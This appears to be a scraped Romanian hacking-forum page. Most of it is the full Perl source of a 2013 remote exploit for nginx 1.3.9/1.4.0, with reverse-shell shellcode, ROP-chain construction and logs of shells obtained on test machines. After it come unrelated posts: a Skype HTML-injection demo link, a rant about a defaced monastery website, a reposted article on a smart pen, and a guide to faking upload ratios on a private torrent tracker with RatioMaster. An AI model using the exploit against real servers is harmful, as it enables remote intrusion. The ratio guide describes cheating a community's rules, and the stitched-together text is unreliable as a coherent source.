Leaderboard

Description : nginx version 1.3.9 and 1.4.0 x86 brute force proof of concept remote exploit that spawns a reverse shell. Author : Kingcope Source : nginx 1.3.9 / 1.4.0 x86 Brute Force Proof Of Concept ? Packet Storm Code : #nginx 1.3.9/1.4.0 x86 brute force remote exploit # copyright (c) 2013 kingcope #---------------------------- #fix for internet exploitation, set MTU: #ifconfig <interface> mtu 60000 up # ### # !!! WARNING !!! # this exploit is unlikely to succeed when used against remote internet hosts. # the reason is that nginx uses a non-blocking read() at the remote connection, # this makes exploitation of targets on the internet highly unreliable. # (it has been tested against a testbed on the internet but I couldn't exploit # any other box with it. required was the above ifconfig setting on the client. # maybe enabling large tcp frame support on a gigabit connection is more # useful) # so use it inside intranets only (duh!), this remains a PoC for now # The exploit does not break stack cookies but makes use of a reliable method # to retrieve all needed offsets for Linux x86 and pop a shell. ### #TODO #*cleanup code #*implement stack cookie break and amd64 support #*support proxy_pass directive ### =for comment TARGET TESTS (Debian, Centos, OpenSuSE) 1. Debian 7 perl ngxunlock.pl 192.168.27.146 80 192.168.27.146 443 Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Finding write offset, determining exact align testing 0x08049c50, 5184 align % SURVIVED % Extracting memory \ bin search done, read 20480 bytes exact align found 5184 Finding exact library addresses trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80 % FOUND exact ioctl 0x08049a30 % trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890 % FOUND exact memset 0x08049ce0 % trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40 % FOUND exact mmap64 0x08049d50 % Found library offsets, determining mnemonics trying 0x0804ed2d % SURVIVED % exact large pop ret 0x0804a7eb exact pop x3 ret 0x0804a7ee bin search done | See reverse handler for success nc -v -l -p 443 listening on [any] 443 ... 192.168.27.146: inverse host lookup failed: Unknown host connect to [192.168.27.146] from (UNKNOWN) [192.168.27.146] 34778 uname -a;id; Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) cat /etc/debian_version 7.1 2. CentOS 6.4 perl ngxunlock.pl 192.168.27.129 80 192.168.27.129 443 Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5194 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5194 align % SEGV % Finding write offset, determining exact align testing 0x08049990, 5200 align % SURVIVED % Extracting memory / bin search done, read 20480 bytes exact align found 5200 Finding exact library addresses trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0 % FOUND exact memset 0x080499f0 % trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0 % FOUND exact ioctl 0x08049b50 % trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0 % FOUND exact mmap64 0x08049f10 % Found library offsets, determining mnemonics trying 0x0804e9d4 % SURVIVED % exact large pop ret 0x0806194d exact pop x3 ret 0x0804a832 bin search done / See reverse handler for success nc -v -l 443 Connection from 192.168.27.129 port 443 [tcp/https] accepted uname -a;id; Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 cat /etc/redhat* CentOS release 6.4 (Final) 3. OpenSuSE 12.1 perl ngxunlock.pl 192.168.27.135 80 192.168.27.135 443 Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Finding write offset, determining exact align testing 0x08049a18, 5184 align % SURVIVED % Extracting memory \ bin search done, read 20480 bytes exact align found 5184 Finding exact library addresses trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0 % FOUND exact memset 0x08049a68 % trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160 % FOUND exact ioctl 0x08049b88 % trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0 % FOUND exact mmap64 0x08049ee8 % Found library offsets, determining mnemonics trying 0x0804ea7f % SURVIVED % exact large pop ret 0x0804a7fa exact pop x3 ret 0x0804a101 bin search done - See reverse handler for success Connection from 192.168.27.135 port 443 [tcp/https] accepted uname -a;id; Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup) cat /etc/SuSE-* openSUSE VERSION = 12.1 openSUSE 12.1 (i586) VERSION = 12.1 CODENAME = Asparagus =cut use IO::Socket; if ($#ARGV < 3) { print "nginx remote exploit\n"; print "copyright (c) 2013 kingcope\n"; print "usage: $0 <target> <target port> <reverse ip> <reverse port>\n"; exit; } $target = $ARGV[0]; $targetport = $ARGV[1]; $cbip = $ARGV[2]; $cbport = $ARGV[3]; #linux reverse shell by bighawk $lnxcbsc = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90\x6a\x66\x58\x6a\x01\x5b" ."\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x68" ."\x7f\x7f\x7f\x7f" # IP ."\x66\x68" . "\xb0\xef" # PORT ."\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x6a\x03\x5b\x6a\x66" ."\x58\xcd\x80\x87\xf3\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xd2" ."\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); substr($lnxcbsc, 31, 4, $a1 . $a2 . $a3 . $a4); ($p1, $p2) = split(//, reverse(pack("s", $cbport))); $p1 = chr(ord($p1)); $p2 = chr(ord($p2)); substr($lnxcbsc, 37, 2, $p1 . $p2); $|=1; $uri=""; ###test target vulnerable #XXX #$k = 0x80498d0; #$align2 = 5200; #$alignplus=0; #goto debug; print "Testing if remote httpd is vulnerable "; $uritested = 0; test: goto l; connecterr: if ($j==0) { print "\nDestination host unreachable\n"; exit; } goto again; l: for ($j=0;$j<15;$j++) { again: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto connecterr}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: close\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); twinkle(); print $sock $req; send($sock, "A" x (5555-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); close($sock); twinkle(); if ($buffer =~ /HTTP\/1.1/) { next; } if ($l <= 0) { print "% SEGV %\n"; print "YES %\n"; goto yes; } } if ($uritested == 0) { $uri = "50x.html"; $uritested=1; goto test; } print "\n\\\\ NO %\n"; print "\\\\ Try to increase client MTU with ifconfig <interface> mtu 60000 up\n\n\\\\ Debug output\n"; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto connecterr}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "GET / HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x (5555-1024) . $stack, MSG_OOB); $line = 0; while(<$sock>) { print; if ($line > 30) { last; } } exit; ###find align $verifyalign = 0; yes: print "Finding align distance (estimate)\n"; for ($align=4050;$align<6000;$align+=100) { for ($j=0;$j<15;$j++) { printf("testing %d align ",$align); again0_1: # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again0_1}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again0_1}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x ($align-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); twinkle(); close($sock); if ($l <= 0) { if ($align == 4050) { goto out; } print " % SEGV %\n"; $alignstart = $align-100; goto incalign; } print "\r\r\r\r"; if ($buffer =~ /HTTP\/1.1/) { next; } close($sock); } } out: print "\n\\\\ Align not found\n"; exit; incalign: for ($align=$alignstart;$align<6000;$align++) { for ($j=0;$j<7;$j++) { printf("testing %d align ",$align); again0_2: # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again0_2}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again0_2}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x ($align-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); twinkle(); close($sock); if ($l <= 0) { print " % SEGV %\n"; if ($verifyalign == 0) { print "Verifying align\n"; $verifyalign = $align; goto yes; } if (($align > $verifyalign + 4) || ($align < $verifyalign - 4)) { print "\\\\ Align and verfied align do not match\n"; exit; } if ($verifyalign < $align) { $align = $verifyalign; } goto begin; } print "\r\r\r\r"; if ($buffer =~ /HTTP\/1.1/) { next; } close($sock); } } print "\n\\\\ could not find align value. bailing out"; exit; ###find write offset begin: print "Finding write offset, determining exact align\n"; $align2 = $align; $ok = 0; #for ($k=0x8049d30;$k<=0x0804FFFF;$k+=4) { for ($k=0x08049800;$k<=0x0804FFFF;$k+=4) { #for ($k=0x0804dc00;$k<=0x0804FFFF;$k+=4) { for ($alignplus=0;$alignplus<7;$alignplus++) { debug: for ($j=0;$j<10;$j++) { if (pack("V", $k) =~ /\x20/) { next; } $align = $align2 + $alignplus; printf("testing 0x%08x, %d align ",$k,$align); again1: # if ($ok==0) { # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again1}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); # } $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again1}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; # $k = 0x8049e30; #XXX $stack = pack("V", $k) # write plt assumed,eg 0x804ab6c . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $k-0x1000) # write buffer . "\xff\xff\xf0\x00"; # write size #$p = <stdin>; print $sock $req; if ($ok == 0) { send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); } else { send($sock, "A" x ($align-1024) . $stack . "A" x 500, MSG_OOB); } $l = read($sock, $buffer, 0x5000); twinkle(); close($sock); #0x8049c50 if ($buffer =~ /HTTP\/1.1/) { if ($ok == 0) { print "\r\r\r\r"; next; } else { goto again1; } } if ($ok == 1 && length($buffer) < 0x2000) { goto again1; } if (length($buffer) > 350) { if ($ok == 0) { $ok = 1; print " % SURVIVED %\n"; print("Extracting memory "); goto again1; } print "\nbin search done, "; printf("read %d bytes\n", $l); goto hit; } print "\r\r\r\r"; } } } print "\n\\\\unable to get write offset\n"; exit; hit: printf("exact align found %d\n", $align); print "Finding exact library addresses\n"; $write = $k; $writeless = $write-0x1000; ### find offsets for mmap64, memset and ioctl $mmap64 = ""; $ioctl = ""; $memset = ""; $mmap64_prefix = "\x55\x53\x56\x57\x8b\x54\x24\x28" ."\x8b\x4c\x24\x2c\xf7\xc2\xff\x0f" ."\x00\x00\x75"; $ioctl_prefix = "\x53\x8b\x54\x24\x10\x8b\x4c\x24" ."\x0c\x8b\x5c\x24\x08\xb8\x36\x00" ."\x00\x00"; $memset_prefix = "\x53\x8b\x4c\x24\x10\x0f\xb6\x44" ."\x24\x0c\x88\xc4\x89\xc2\xc1\xe0" ."\x10\x09\xd0\x8b\x54\x24\x08\x83"; $memset_prefix2 = "\xfc\x57\x8b\x54\x24\x08\x8b\x4c" ."\x24\x10\x0f\xb6\x44\x24\x0c\xe3" ."\x2c\x89\xd7\x83\xe2\x03\x74\x11"; $memset_prefix3 = "\x57\x8b\x7c\x24\x08\x8b\x54\x24" ."\x10\x8a\x44\x24\x0c\x88\xc4\x89" ."\xc1\xc1\xe0\x10\x66\x89\xc8\xfc"; $memset_prefix4 = "\x55\x89\xe5\x57\x56\x83\xec\x04". "\x8b\x75\x08\x0f\xb6\x55\x0c\x8b". "\x4d\x10\x89\xf7\x89\xd0\xfc\x83"; $buffer2 = $buffer; $buffer3 = $buffer; plt_again: $buffer2 = $buffer3; for( { $i = index($buffer2, "\xff\x25"); if ($i >= 0) { if (($j = index($buffer3, substr($buffer2, $i, 50))) <= 0) { $buffer2 = substr($buffer2, $i+2); next; } $buffer2 = substr($buffer2, $i+2); $address = $writeless + $j; ### delve into library function printf "trying plt 0x%08x, ", ($address+2); again2: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again2}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $address+2) # write buffer . "\x00\x03\x00\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); $l = read($sock, $buffer, 0x300); if ($buffer =~ /HTTP\/1.1/) { goto again2; } if ($l == 0x300) { $gotentry = unpack("V", substr($buffer,0,4)); if ($gotentry == 0) { print "\r\r\r\r"; next; } close($sock); } else { close($sock); goto again2; } printf "got 0x%08x, ", $gotentry; again3: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again3}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $gotentry) # write buffer . "\x00\x03\x00\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); $l = read($sock, $buffer, 0x300); close($sock); if ($buffer =~ /HTTP\/1.1/) { goto again3; } if ($l == 0x300) { $function = unpack("V", substr($buffer,0,4)); } else { goto again3; } if ($function == 0) { print "\r\r\r\r"; next; } printf "function 0x%08x ", $function; again4: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again4}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $function) # write buffer . "\xff\xff\xf0\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); #$p = <stdin>; $l = read($sock, $buffer, 0x500); close($sock); if ($buffer =~ /HTTP\/1.1/) { goto again4; } if ($l != 0x500) { goto again4; } ### if (substr($buffer, 0, length($mmap64_prefix)) eq $mmap64_prefix) { $mmap64 = $address; printf(" %% FOUND exact mmap64 0x%08x %%\n", $mmap64); } if ((substr($buffer, 0, length($memset_prefix)) eq $memset_prefix) or (substr($buffer, 0, length($memset_prefix2)) eq $memset_prefix2) or (substr($buffer, 0, length($memset_prefix3)) eq $memset_prefix3) or (substr($buffer, 0, length($memset_prefix4)) eq $memset_prefix4)) { $memset = $address; printf(" %% FOUND exact memset 0x%08x %%\n", $memset); } if (substr($buffer, 0, length($ioctl_prefix)) eq $ioctl_prefix) { $ioctl = $address; printf(" %% FOUND exact ioctl 0x%08x %%\n", $ioctl); } if (($mmap64 ne "") and ($memset ne "") and ($ioctl ne "")) { goto gotplt; } print "\r\r\r\r"; } else { last; } } print "\nFinding exact library addresses\n"; goto plt_again; gotplt: print "Found library offsets, determining mnemonics\n"; ### find pop pop pop ret ### to set socket blocking for ($k=$write + 0x5000;;$k++) { printf("trying 0x%08x ",$k); again5: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again5}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $ioctl) . pack("V", $k) # pop pop pop ret assumed . "\x03\x00\x00\x00" . "\x21\x54\x00\x00" . "\x08\x80\x04\x08" # null byte . pack("V", $write) # write plt found . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $write) # write buffer . "\xff\xff\x0f\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); #$p = <stdin>; $l = read($sock, $buffer, 0xfffff); close($sock); twinkle(); if ($buffer =~ /HTTP\/1.1/) { again5; } if ($l > 0xfff) { print " % SURVIVED %\n"; close($sock); goto hit2; } print "\r\r\r\r"; next; } hit2: ###send attack buffer ###find largepopret @matches = $buffer =~ /(\x83\xc4\x20[\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d]\xc3)/g; foreach $m (@matches) { $i = index($buffer, $m); twinkle(); print "\r"; if ($i >= 0) { $__largepopret = $write + $i; printf("exact large pop ret 0x%08x\n", $__largepopret); goto hit3; } } print "\\\\ large pop ret not found\n"; exit; hit3: ###find poppoppopret @matches = $buffer =~ /([\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d]\xc3)/g; foreach $m (@matches) { $i = index($buffer, $m); if ($i >= 0) { $__poppoppopret = $write + $i; printf("exact pop x3 ret 0x%08x\n", $__poppoppopret); goto attack; } } print "\\\\ poppoppopret not found\n"; exit; attack: $largepopret = pack("V", $__largepopret); $popblock = "\x00\x00\x00\x00" ."\x00\x00\x00\x00" ."\x00\x00\x00\x00" ."\x00\x00\x00\x00"; $popret = pack("V", $__poppoppopret+2); $poppoppopret = pack("V", $__poppoppopret); $pop3ret = $__poppoppopret; $copycode = "\xfc\x8b\xf4\xbf\x00\x01\x00\x10\xb9\x00\x02\x00\x00\xf3\xa4" ."\xeb\xff"; $memsetcode = ""; $copyaddress = 0x10000000; for ($i=0;$i<length($copycode);$i++) { $byte = substr($copycode, $i, 1); $memsetcode .= pack("V", $memset) . pack("V", $pop3ret) . pack("V", $copyaddress) . $byte . "\x00\x00\x00" . "\x01\x00\x00\x00"; $copyaddress++; } for ($q=0;$q<10;$q++) { print "bin search done "; sleep(1); twinkle(); print "\r" } print "\n"; print "See reverse handler for success\n"; again6: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again6}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: close\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $mmap64) . $largepopret ."\x00\x00\x00\x10" # mmap start ."\x00\x10\x00\x00" # mmap size ."\x07\x00\x00\x00" # mmap prot ."\x32\x00\x00\x00" # mmap flags ."\xff\xff\xff\xff" # mmap fd ."\x00\x00\x00\x00" # mmap offset ."\x00\x00\x00\x00" # mmap offset . $popblock . $memsetcode . "\x00\x00\x00\x10" # JUMP TO 0x10000000 (rwxp addr) . "\x90" x 100 . $lnxcbsc; #$p = <stdin>; print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); close($sock); goto again6; # XXX my $current = 0; sub twinkle { $cursors[0] = "|"; $cursors[1] = "/"; $cursors[2] = "-"; $cursors[3] = "\\"; print "$cursors[$current++]\b"; if ($current > 3) { $current = 0; } }

Description: Demo: HTML Injection Skype Vulnerability danielhaake.de Sursa: Demo: Html Injection Skype Vulnerability

Am mai auzit popi care fac slujbele pe net si chestii.Eu sunt de parere ca biserica ar trebui sa se detaseze un pic de tehnologie.Ar trebui sa fie multumiti ca n-au pus filmulete porno pe siteul celor la care au dat deface.Nu ca as tine cu cei care au dat deface,dar poate asta e un semnal impotriva coruptiei si a ceea ce in multe cazuri religia inseamna afacere in zilele noastre. "Au închis site-ul mân?stirii ”Petru Vod?” ( fiind probabil deranja?i de atitudinea împotriva actelor cu CIP a ob?tei din mân?stirea respectiva" acum am citit,deci asta e motivul.Ce minte inchisa poate sa afirme ca dracu e in cip sau in codul de bare?In loc sa zica ca de fapt pericolul nu e in cipul ala biometric,ci in depersonalizarea individului,intr-o amestecare in trendul murdar spre care duce modernitatea,spre standardizare in defavoarea eului propriu,ei au luat niste texte vechi si le traduc mot-a-mot.

Lernstift — German for “learning pen” — is a Linux-based smart pen that will notify users when they make mistakes. Photo: Lernstift What if your pen could warn you about spelling mistakes, just like your word processor? Lernstift — German for “learning pen” — is a Linux-based smart pen that not only corrects spelling, but can also help students, or anyone else, improve their handwriting. There are other smart pens on the market, such as the Livescribe, but Lernstift is unusual in that doesn’t require special paper and will have exchangeable pen tips — including a fountain pen module, a ballpoint module, and, eventually, a pencil module. The gadget is now available for pre-order through Kickstarter and is expected to ship in December. But why worry about enhancing handwriting on paper just when society seems to be abandoning that skill in favor of typing, or at least using digital styluses? Lernstift inventor Falk Wolsky explains that the idea was born out of frustration with his oldest son’s homework mistakes. Wolsky says his son was too often distracted, and would make small, preventable errors. “My wife said: ‘I wish the pen would give him an electroshock or something to make him think about his spelling,’” Wolsky says. “I thought, an electroshock wasn’t so good, but a vibration might work.” Wolsky doubts old fashioned handwriting will ever go away, citing research on its cognitive benefits. For example, one study by researchers at Indiana University found that students who wrote letters and other symbols by hand could better identify those shapes later than those who just studied them without writing them. Lernstift works by monitoring what a user is writing using built in sensors. It can then send data wirelessly to a computer or tablet that can analyze what’s being written and then tell the pen to vibrate if the user draws a letter too sloppily, or if they misspell a word. “They get instant feedback, instead of feedback three days later when the teacher hands the paper back covered in red marks,” Wolsky says. The pen uses a custom embedded Linux operating system with custom, closed-source software that controls the sensors and handles handwriting recognition. But Lernstift will have an open API so that developers can build new applications for the pen, whether that’s new dictionaries to support spell checking in different languages, or ways to use the pen to transfer drawings to Photoshop. “The developer platform is extremely important part for us,” he says. Lernstift is yet another example of how “the internet of things” can turn household items like pens into programmable “smart objects.” Even something as old fashioned as handwriting can be given new dimensions. Sursa Wired.Com Parerea mea : Aceasta inventie este una geniala ; Asta ar fi un element surpriza sa le dai copiilor de 6-16 ani , in general copiilor romani sa invete sa scrie , iar la fiecare greseala sa fie atentionati sau cum a zis nevasta celui de mai sus : " sa le dea un electrosoc " ( just kiddin' )

Imi place, mai ales designul lui Gecko. Problema e ca se loveste de regulament daca il punem pe forum.

bv ai mai facut un post ))

Salut rst! Am cautat putin pe google cum sa-mi maresc rapid ratia pe filelist si am dat de acest program :GirlShare - Download RatioMaster.NET.exe - RatioMaster se numeste. Pasul 1 : Descarci un torrent de pe filelist.(Nu conteaza freelech sau normal) Pasul 2 : In program apesi pe butonul "Browse" si cauti torrentul descarcat pe care il selectezi si apesi open. Pasul 3 : Setezi o viteza de upload si download in kb/s.(Mereu am folosit la upload 4500 cu "Random values de la 4400 pana la 4600 si la download 0) Pasul 4 : Apesi pe "START" si privesti cum iti creste ratia! *Pentru ca programul sa mearga trebuie sa aveti unul dintre programele care apar in sectiunea "Options" la "Client:" * O poza cu programul : http://imageshack.us/photo/my-images/14/7ln8.jpg/ Virus scan : https://www.virustotal.com/ro/file/fc7dc61d450ecc5068fe807807faae953f90a6e4e8a65c2343ef731658f549d8/analysis/ //Link poza cu torrent activ la upload : http://imageshack.us/photo/my-images/90/tyxm.jpg/ Am uitat sa va spun, puteti pune upload la mai multe torrente odata apasand butonul incercuit in imagine : http://imageshack.us/photo/my-images/822/27w2.jpg/